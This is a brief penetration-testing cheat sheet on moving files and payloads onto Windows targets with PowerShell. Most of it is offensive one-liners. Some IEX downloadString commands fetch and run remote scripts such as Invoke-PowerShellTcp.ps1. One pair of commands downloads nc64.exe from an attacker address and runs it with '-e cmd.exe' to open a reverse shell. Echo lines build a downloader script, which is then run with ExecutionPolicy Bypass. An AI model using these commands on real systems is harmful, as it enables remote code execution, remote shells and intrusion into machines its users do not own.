File transfer PowerShell

Goals

• For Win7, 2008 and above
• Support PowerShell

Method 1 - Single command

Normally use in remote execution

• Download file to the exact folder: powershell.exe (New-Object System.Net.WebClient).DownloadFile('https://example.com/archive.zip', 'C:\Windows\Temp\archive.zip')
• powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://<script>')"
• powershell full path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe
• In web URL: C%3a\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe+IEX(New-Object+Net.Webclient).downloadString('http%3a//10.10.14.15/Invoke-PowerShellTcp.ps1')

If already in Powershell cmd

• To run "IEX(New-Object Net.WebClient).downloadString('http:///<script>')"

Method 2

In Victim PC

• powershell “wget http://attacker_ip/nc64.exe -OutFile nc64.exe”
• nc64.exe attacker-ip <PORT> -e cmd.exe

Method 3

In attacker PC

To create a file "wget.ps1" in victim PC

• echo $storageDir = $pwd > wget.ps1
• echo $webclient = New-Object System.Net.WebClient >>wget.ps1
• echo $url = "http://attacker_ip/nc.exe" >>wget.ps1
• echo $file = "new-exploit.exe" >>wget.ps1
• echo $webclient.DownloadFile($url,$file) >>wget.ps1

In victim PC

To run script to download file

• powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Copy and paste to non-interactive remote shell

• To copy content of the above file in a non-interactive remote shell
• To execute and download a file